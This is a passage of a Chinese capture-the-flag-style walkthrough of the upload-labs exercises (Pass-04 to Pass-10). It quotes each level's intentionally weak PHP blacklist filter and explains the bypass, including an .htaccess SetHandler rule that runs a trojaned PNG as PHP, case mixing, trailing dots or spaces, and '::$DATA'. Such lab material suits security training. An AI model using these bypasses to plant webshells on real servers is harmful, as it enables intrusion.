class="line"> $msg = <span class="string">'此文件不允许上传!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>+++</p><ul><li><p>拦截方式:<strong>服务端黑名单加强验证</strong>;与Pass-03类似,只是对上传文件的后缀名的限制种类增加</p></li><li><p>绕过方式:重写文件解析规则绕过(第3关(2))</p><ol><li>上传<code>.htaccess文件</code></li></ol><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="section"><FilesMatch "hack.png"></span></span><br><span class="line"><span class="attribute"><span class="nomarkup">SetHandler</span></span> application/x-httpd-php</span><br><span class="line"><span class="section"></FilesMatch></span></span><br></pre></td></tr></table></figure><ol start="2"><li>上传hack.png(含木马)</li></ol></li></ul><p><img src="https://s1.ax1x.com/2020/05/02/JvRBYd.png" alt="JvRBYd.png"></p><p>上传成功,并以php进行了解析!</p><p>+++</p><h2 id="Pass-05"><a href="#Pass-05" class="headerlink" title="Pass-05"></a>Pass-05</h2><p>首先,尝试上传php文件,提示信息为:*<em>提示:此文件类型不允许上传! *</em></p><p>查看提示:</p><blockquote><p>本pass禁止上传.php|.php5|.php4|.php3|.php2|php1|.html|.htm|.phtml|.pHp|.pHp5|.pHp4|.pHp3|.pHp2|pHp1|.Html|.Htm|.pHtml|.jsp|.jspa|.jspx|.jsw|.jsv|.jspf|.jtml|.jSp|.jSpx|.jSpa|.jSw|.jSv|.jSpf|.jHtml|.asp|.aspx|.asa|.asax|.ascx|.ashx|.asmx|.cer|.aSp|.aSpx|.aSa|.aSax|.aScx|.aShx|.aSmx|.cEr|.sWf|.swf|.htaccess后缀文件!</p></blockquote><p>Pass-05向黑名单中增加了<code>.htaccess</code>后缀文件;</p><p>源码:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> $deny_ext = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span class="string">".pHp2"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>,<span class="string">".htaccess"</span>);</span><br><span class="line"> $file_name = trim($_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> $file_name = deldot($file_name);<span class="comment">//删除文件名末尾的点</span></span><br><span class="line"> $file_ext = strrchr($file_name, <span class="string">'.'</span>);</span><br><span class="line"> $file_ext = str_ireplace(<span class="string">'::$DATA'</span>, <span class="string">''</span>, $file_ext);<span class="comment">//去除字符串::$DATA</span></span><br><span class="line"> $file_ext = trim($file_ext); <span class="comment">//首尾去空</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (!in_array($file_ext, $deny_ext)) {</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">'/'</span>.date(<span class="string">"YmdHis"</span>).rand(<span class="number">1000</span>,<span class="number">9999</span>).$file_ext;</span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file($temp_file, $img_path)) {</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'此文件类型不允许上传!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>删除了该语句:<code>$file_ext = strtolower($file_ext); //转换为小写</code></p><p>+++</p><ul><li>拦截方式:<strong>服务端黑名单超级加强</strong>;.htaccess加入了黑名单,取消了后缀名全变为小写字母的strtolower()函数</li><li>绕过方式:采用大小写混合方式绕过.PhP,.PHp5,或着.hTacCesS文件…</li></ul><p><img src="https://s1.ax1x.com/2020/05/02/JvR0FH.png" alt="JvR0FH.png"></p><p>上传成功!</p><p>+++</p><h2 id="Pass-06"><a href="#Pass-06" class="headerlink" title="Pass-06"></a>Pass-06</h2><p>首先,尝试上传php文件,提示信息为:*<em>提示:此文件不允许上传 *</em></p><p>查看提示:</p><blockquote><p>本pass禁止上传.php|.php5|.php4|.php3|.php2|php1|.html|.htm|.phtml|.pHp|.pHp5|.pHp4|.pHp3|.pHp2|pHp1|.Html|.Htm|.pHtml|.jsp|.jspa|.jspx|.jsw|.jsv|.jspf|.jtml|.jSp|.jSpx|.jSpa|.jSw|.jSv|.jSpf|.jHtml|.asp|.aspx|.asa|.asax|.ascx|.ashx|.asmx|.cer|.aSp|.aSpx|.aSa|.aSax|.aScx|.aShx|.aSmx|.cEr|.sWf|.swf后缀文件!</p></blockquote><p>源码:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> $deny_ext = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span class="string">".pHp2"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>,<span class="string">".htaccess"</span>);</span><br><span class="line"> $file_name = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>];</span><br><span class="line"> $file_name = deldot($file_name);<span class="comment">//删除文件名末尾的点</span></span><br><span class="line"> $file_ext = strrchr($file_name, <span class="string">'.'</span>);</span><br><span class="line"> $file_ext = strtolower($file_ext); <span class="comment">//转换为小写</span></span><br><span class="line"> $file_ext = str_ireplace(<span class="string">'::$DATA'</span>, <span class="string">''</span>, $file_ext);<span class="comment">//去除字符串::$DATA</span></span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span> (!in_array($file_ext, $deny_ext)) {</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">'/'</span>.date(<span class="string">"YmdHis"</span>).rand(<span class="number">1000</span>,<span class="number">9999</span>).$file_ext;</span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file($temp_file,$img_path)) {</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'此文件不允许上传'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><blockquote><p>提示和源码里的黑名单并不一致,提示里少了.htaccess<br><code>$file_ext = trim($file_ext); //首尾去空</code><br>+++</p></blockquote><ul><li>拦截方式:<strong>服务端黑名单</strong>;去掉了去除空格的trim函数;</li><li>绕过方式:选择后缀为<code>.php</code>的一句话上传,抓包后在后面增加空格;</li></ul><p><img src="https://s1.ax1x.com/2020/05/02/JvRylt.png" alt="JvRylt.png"></p><p>上传成功!</p><p>+++</p><h2 id="Pass-07"><a href="#Pass-07" class="headerlink" title="Pass-07"></a>Pass-07</h2><p>首先,尝试上传php文件,提示信息为:*<em>提示:此文件不允许上传 *</em></p><p>查看提示:</p><blockquote><p>本pass禁止上传所有可以解析的后缀!</p></blockquote><p>源码:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> $deny_ext = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span class="string">".pHp2"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>,<span class="string">".htaccess"</span>);</span><br><span class="line"> $file_name = trim($_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> $file_ext = strrchr($file_name, <span class="string">'.'</span>);</span><br><span class="line"> $file_ext = strtolower($file_ext); <span class="comment">//转换为小写</span></span><br><span class="line"> $file_ext = str_ireplace(<span class="string">'::$DATA'</span>, <span class="string">''</span>, $file_ext);<span class="comment">//去除字符串::$DATA</span></span><br><span class="line"> $file_ext = trim($file_ext); <span class="comment">//首尾去空</span></span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span> (!in_array($file_ext, $deny_ext)) {</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">'/'</span>.$file_name;</span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file($temp_file, $img_path)) {</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'此文件类型不允许上传!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><blockquote></blockquote><p>+++</p><ul><li>拦截方式:<strong>服务端黑名单</strong>;</li><li>绕过方式:没有删除结尾的“.”,利用windows特性,会自动去掉后缀名中最后的”.”,可在后缀名中加”.”绕过;</li></ul><p>+++</p><h2 id="Pass-08"><a href="#Pass-08" class="headerlink" title="Pass-08"></a>Pass-08</h2><p>首先,尝试上传php文件,提示信息为:*<em>提示:此文件不允许上传 *</em></p><p>查看提示:</p><blockquote><p>本pass禁止上传.php|.php5|.php4|.php3|.php2|php1|.html|.htm|.phtml|.pHp|.pHp5|.pHp4|.pHp3|.pHp2|pHp1|.Html|.Htm|.pHtml|.jsp|.jspa|.jspx|.jsw|.jsv|.jspf|.jtml|.jSp|.jSpx|.jSpa|.jSw|.jSv|.jSpf|.jHtml|.asp|.aspx|.asa|.asax|.ascx|.ashx|.asmx|.cer|.aSp|.aSpx|.aSa|.aSax|.aScx|.aShx|.aSmx|.cEr|.sWf|.swf|.htaccess后缀文件!</p></blockquote><p>源码:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> $deny_ext = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span class="string">".pHp2"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>,<span class="string">".htaccess"</span>);</span><br><span class="line"> $file_name = trim($_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> $file_name = deldot($file_name);<span class="comment">//删除文件名末尾的点</span></span><br><span class="line"> $file_ext = strrchr($file_name, <span class="string">'.'</span>);</span><br><span class="line"> $file_ext = strtolower($file_ext); <span class="comment">//转换为小写</span></span><br><span class="line"> $file_ext = trim($file_ext); <span class="comment">//首尾去空</span></span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span> (!in_array($file_ext, $deny_ext)) {</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">'/'</span>.date(<span class="string">"YmdHis"</span>).rand(<span class="number">1000</span>,<span class="number">9999</span>).$file_ext;</span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file($temp_file, $img_path)) {</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'此文件类型不允许上传!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><blockquote></blockquote><p>+++</p><ul><li>拦截方式:<strong>服务端黑名单</strong>;</li><li>绕过方式:Windows系统下,如果上传的文件名中test.php::$DATA会在服务器上生成一个test.php的文件,其中内容和所上传文件内容相同,并被解析。</li></ul><p>+++</p><h2 id="Pass-09"><a href="#Pass-09" class="headerlink" title="Pass-09"></a>Pass-09</h2><p>首先,尝试上传php文件,提示信息为:*<em>提示:此文件不允许上传 *</em></p><p>查看提示:</p><blockquote><p>本pass只允许上传.jpg|.png|.gif后缀的文件!</p></blockquote><p>源码:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> $deny_ext = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span class="string">".pHp2"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>,<span class="string">".htaccess"</span>);</span><br><span class="line"> $file_name = trim($_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> $file_name = deldot($file_name);<span class="comment">//删除文件名末尾的点</span></span><br><span class="line"> $file_ext = strrchr($file_name, <span class="string">'.'</span>);</span><br><span class="line"> $file_ext = strtolower($file_ext); <span class="comment">//转换为小写</span></span><br><span class="line"> $file_ext = str_ireplace(<span class="string">'::$DATA'</span>, <span class="string">''</span>, $file_ext);<span class="comment">//去除字符串::$DATA</span></span><br><span class="line"> $file_ext = trim($file_ext); <span class="comment">//首尾去空</span></span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span> (!in_array($file_ext, $deny_ext)) {</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">'/'</span>.$file_name;</span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file($temp_file, $img_path)) {</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'此文件类型不允许上传!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><blockquote></blockquote><p>+++</p><ul><li><p>拦截方式:<strong>服务端黑名单</strong>;</p></li><li><p>绕过方式:</p><ul><li><figure class="highlight arcade"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="symbol">$im</span>g_path = UPLOAD_PATH.<span class="string">'/'</span>.<span class="symbol">$file</span>_name;</span><br><span class="line">路径拼接的是处理后的文件名</span><br></pre></td></tr></table></figure></li><li><p>加 <strong>点+空格+点</strong></p></li></ul></li></ul><p>+++</p><h2 id="Pass-10"><a href="#Pass-10" class="headerlink" title="Pass-10"></a>Pass-10</h2><p>首先,尝试上传php文件,提示信息为:*<em>提示:此文件不允许上传 *</em></p><p>查看提示:</p><blockquote><p>本pass会从文件名中去除.php|.php5|.php4|.php3|.php2|php1|.html|.htm|.phtml|.pHp|.pHp5|.pHp4|.pHp3|.pHp2|pHp1|.Html|.Htm|.pHtml|.jsp|.jspa|.jspx|.jsw|.jsv|.jspf|.jtml|.jSp|.jSpx|.jSpa|.jSw|.jSv|.jSpf|.jHtml|.asp|.aspx|.asa|.asax|.ascx|.ashx|.asmx|.cer|.aSp|.aSpx|.aSa|.aSax|.aScx|.aShx|.aSmx|.cEr|.sWf|.swf|.htaccess字符!</p></blockquote><p>源码:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> $deny_ext = <span class="keyword">array</span>(<span class="string">"php"</span>,<span class="string">"php5"</span>,<span class="string">"php4"</span>,<span class="string">"php3"</span>,<span class="string">"php2"</span>,<span class="string">"html"</span>,<span class="string">"htm"</span>,<span class="string">"phtml"</span>,<span class="string">"pht"</span>,<span class="string">"jsp"</span>,<span class="string">"jspa"</span>,<span class="string">"jspx"</span>,<span class="string">"jsw"</span>,<span class="string">"jsv"</span>,<span class="string">"jspf"</span>,<span class="string">"jtml"</span>,<span class="string">"asp"</span>,<span class="string">"aspx"</span>,<span class="string">"asa"</span>,<span class="string">"asax"</span>,<span class="string">"ascx"</span>,<span class="string">"ashx"</span>,<span class="string">"asmx"</span>,<span class="string">"cer"</span>,<span class="string">"swf"</span>,<span class="string">"htaccess"</span>);</span><br><span class="line"></span><br><span class="line"> $file_name = trim($_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> $file_name = str_ireplace($deny_ext,<span class="string">""</span>, $file_name);</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">'/'</span>.$file_name; </span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file($temp_file, $img_path)) {</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><blockquote></blockquote><p>+++</p><ul><li><p>拦截方式:<strong>服务端黑名单</strong>;</p><ul><li><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$file_name = 